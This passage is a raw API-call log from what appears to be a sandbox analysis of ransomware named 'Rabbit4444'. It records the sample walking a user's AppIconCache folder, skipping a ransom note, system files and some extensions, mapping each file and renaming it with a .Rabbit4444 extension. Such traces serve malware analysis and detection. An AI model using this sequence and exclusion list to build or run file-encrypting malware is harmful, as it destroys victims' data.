ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", cAlternateFileName="{E35E8~1")) returned 1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="Rabbit4444.exe") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2=".") returned 1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="..") returned 1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="windows") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="bootmgr") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="pagefile.sys") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="boot") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="ids.txt") returned -1 [0068.465] lstrcmpiW (lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}", lpString2="NTUSER.DAT") returned -1 [0068.465] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{E35E895E-B105-44CC-9B2B-8D9A698783C6}" | out: lpString1="{E35E895E-B105-44CC-9B2B-8D9A698783C6}") returned="{E35E895E-B105-44CC-9B2B-8D9A698783C6}" [0068.465] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E35E895E-B105-44CC-9B2B-8D9A698783C6}", dwFileAttributes=0x0) returned 1 [0068.466] lstrlenW (lpString="{E35E895E-B105-44CC-9B2B-8D9A698783C6}") returned 38 [0068.466] lstrlenW (lpString="Rabbit4444") returned 10 [0068.466] lstrcmpiW (lpString1="A698783C6}", lpString2="Rabbit4444") returned -1 [0068.466] lstrlenW (lpString=".dll") returned 4 [0068.466] lstrcmpiW (lpString1="3C6}", lpString2=".dll") returned 1 [0068.466] lstrlenW (lpString=".lnk") returned 4 [0068.466] lstrcmpiW (lpString1="3C6}", lpString2=".lnk") returned 1 [0068.466] lstrlenW (lpString=".ini") returned 4 [0068.466] lstrcmpiW (lpString1="3C6}", lpString2=".ini") returned 1 [0068.466] lstrlenW (lpString=".sys") returned 4 [0068.466] lstrcmpiW (lpString1="3C6}", lpString2=".sys") returned 1 [0068.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E35E895E-B105-44CC-9B2B-8D9A698783C6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e35e895e-b105-44cc-9b2b-8d9a698783c6}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.467] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15977728900) returned 1 [0068.467] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0068.467] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.468] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.469] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.469] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15977983528) returned 1 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0068.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.469] CloseHandle (hObject=0x29c) returned 1 [0068.469] CloseHandle (hObject=0x280) returned 1 [0068.469] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E35E895E-B105-44CC-9B2B-8D9A698783C6}.Rabbit4444") returned 156 [0068.470] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E35E895E-B105-44CC-9B2B-8D9A698783C6}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e35e895e-b105-44cc-9b2b-8d9a698783c6}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E35E895E-B105-44CC-9B2B-8D9A698783C6}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e35e895e-b105-44cc-9b2b-8d9a698783c6}.rabbit4444"), dwFlags=0x1) returned 1 [0068.470] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38231567, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{E76B536A-24BE-46E2-8644-8BD44952F288}", cAlternateFileName="{E76B5~1")) returned 1 [0068.470] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.470] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.470] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="Rabbit4444.exe") returned -1 [0068.470] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2=".") returned 1 [0068.470] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="..") returned 1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="windows") returned -1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="bootmgr") returned -1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="pagefile.sys") returned -1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="boot") returned -1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="ids.txt") returned -1 [0068.471] lstrcmpiW (lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}", lpString2="NTUSER.DAT") returned -1 [0068.471] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{E76B536A-24BE-46E2-8644-8BD44952F288}" | out: lpString1="{E76B536A-24BE-46E2-8644-8BD44952F288}") returned="{E76B536A-24BE-46E2-8644-8BD44952F288}" [0068.471] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E76B536A-24BE-46E2-8644-8BD44952F288}", dwFileAttributes=0x0) returned 1 [0068.471] lstrlenW (lpString="{E76B536A-24BE-46E2-8644-8BD44952F288}") returned 38 [0068.471] lstrlenW (lpString="Rabbit4444") returned 10 [0068.471] lstrcmpiW (lpString1="44952F288}", lpString2="Rabbit4444") returned -1 [0068.471] lstrlenW (lpString=".dll") returned 4 [0068.471] lstrcmpiW (lpString1="288}", lpString2=".dll") returned 1 [0068.471] lstrlenW (lpString=".lnk") returned 4 [0068.471] lstrcmpiW (lpString1="288}", lpString2=".lnk") returned 1 [0068.471] lstrlenW (lpString=".ini") returned 4 [0068.471] lstrcmpiW (lpString1="288}", lpString2=".ini") returned 1 [0068.471] lstrlenW (lpString=".sys") returned 4 [0068.471] lstrcmpiW (lpString1="288}", lpString2=".sys") returned 1 [0068.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E76B536A-24BE-46E2-8644-8BD44952F288}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e76b536a-24be-46e2-8644-8bd44952f288}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.472] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.472] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15978246017) returned 1 [0068.472] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0068.472] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0068.472] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.473] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.474] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.474] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15978516007) returned 1 [0068.474] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0068.475] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.475] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.475] CloseHandle (hObject=0x29c) returned 1 [0068.475] CloseHandle (hObject=0x280) returned 1 [0068.475] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E76B536A-24BE-46E2-8644-8BD44952F288}.Rabbit4444") returned 156 [0068.475] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E76B536A-24BE-46E2-8644-8BD44952F288}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e76b536a-24be-46e2-8644-8bd44952f288}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{E76B536A-24BE-46E2-8644-8BD44952F288}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{e76b536a-24be-46e2-8644-8bd44952f288}.rabbit4444"), dwFlags=0x1) returned 1 [0068.476] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c821aae, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c821aae, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", cAlternateFileName="{F034B~1")) returned 1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="Rabbit4444.exe") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2=".") returned 1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="..") returned 1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="windows") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="bootmgr") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="pagefile.sys") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="boot") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="ids.txt") returned -1 [0068.476] lstrcmpiW (lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", lpString2="NTUSER.DAT") returned -1 [0068.476] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}" | out: lpString1="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}") returned="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}" [0068.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}", dwFileAttributes=0x0) returned 1 [0068.476] lstrlenW (lpString="{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}") returned 38 [0068.476] lstrlenW (lpString="Rabbit4444") returned 10 [0068.476] lstrcmpiW (lpString1="EDA4DB720}", lpString2="Rabbit4444") returned -1 [0068.476] lstrlenW (lpString=".dll") returned 4 [0068.476] lstrcmpiW (lpString1="720}", lpString2=".dll") returned 1 [0068.476] lstrlenW (lpString=".lnk") returned 4 [0068.476] lstrcmpiW (lpString1="720}", lpString2=".lnk") returned 1 [0068.476] lstrlenW (lpString=".ini") returned 4 [0068.476] lstrcmpiW (lpString1="720}", lpString2=".ini") returned 1 [0068.476] lstrlenW (lpString=".sys") returned 4 [0068.476] lstrcmpiW (lpString1="720}", lpString2=".sys") returned 1 [0068.476] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f034b648-27f3-4db0-a1e2-76aeda4db720}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.477] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.477] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15978757593) returned 1 [0068.477] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0068.477] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.477] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.482] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.483] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.483] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.484] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15979437695) returned 1 [0068.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0068.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.484] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.484] CloseHandle (hObject=0x29c) returned 1 [0068.484] CloseHandle (hObject=0x280) returned 1 [0068.484] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}.Rabbit4444") returned 156 [0068.484] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f034b648-27f3-4db0-a1e2-76aeda4db720}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F034B648-27F3-4DB0-A1E2-76AEDA4DB720}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f034b648-27f3-4db0-a1e2-76aeda4db720}.rabbit4444"), dwFlags=0x1) returned 1 [0068.485] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c847cee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c847cee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F6932121-D2DA-4225-88E3-261818BB07E2}", cAlternateFileName="{F6932~1")) returned 1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="Rabbit4444.exe") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2=".") returned 1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="..") returned 1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="windows") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="bootmgr") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="pagefile.sys") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="boot") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="ids.txt") returned -1 [0068.485] lstrcmpiW (lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}", lpString2="NTUSER.DAT") returned -1 [0068.485] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{F6932121-D2DA-4225-88E3-261818BB07E2}" | out: lpString1="{F6932121-D2DA-4225-88E3-261818BB07E2}") returned="{F6932121-D2DA-4225-88E3-261818BB07E2}" [0068.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F6932121-D2DA-4225-88E3-261818BB07E2}", dwFileAttributes=0x0) returned 1 [0068.485] lstrlenW (lpString="{F6932121-D2DA-4225-88E3-261818BB07E2}") returned 38 [0068.485] lstrlenW (lpString="Rabbit4444") returned 10 [0068.486] lstrcmpiW (lpString1="818BB07E2}", lpString2="Rabbit4444") returned -1 [0068.486] lstrlenW (lpString=".dll") returned 4 [0068.486] lstrcmpiW (lpString1="7E2}", lpString2=".dll") returned 1 [0068.486] lstrlenW (lpString=".lnk") returned 4 [0068.486] lstrcmpiW (lpString1="7E2}", lpString2=".lnk") returned 1 [0068.486] lstrlenW (lpString=".ini") returned 4 [0068.486] lstrcmpiW (lpString1="7E2}", lpString2=".ini") returned 1 [0068.486] lstrlenW (lpString=".sys") returned 4 [0068.486] lstrcmpiW (lpString1="7E2}", lpString2=".sys") returned 1 [0068.486] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{F6932121-D2DA-4225-88E3-261818BB07E2}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{f6932121-d2da-4225-88e3-261818bb07e2}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.486] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.486] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15979689871) returned 1 [0068.486] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0068.486] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0068.486] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.487] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.488] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.489] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15979936648) returned 1 [0068.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0068.489] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0068.489] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 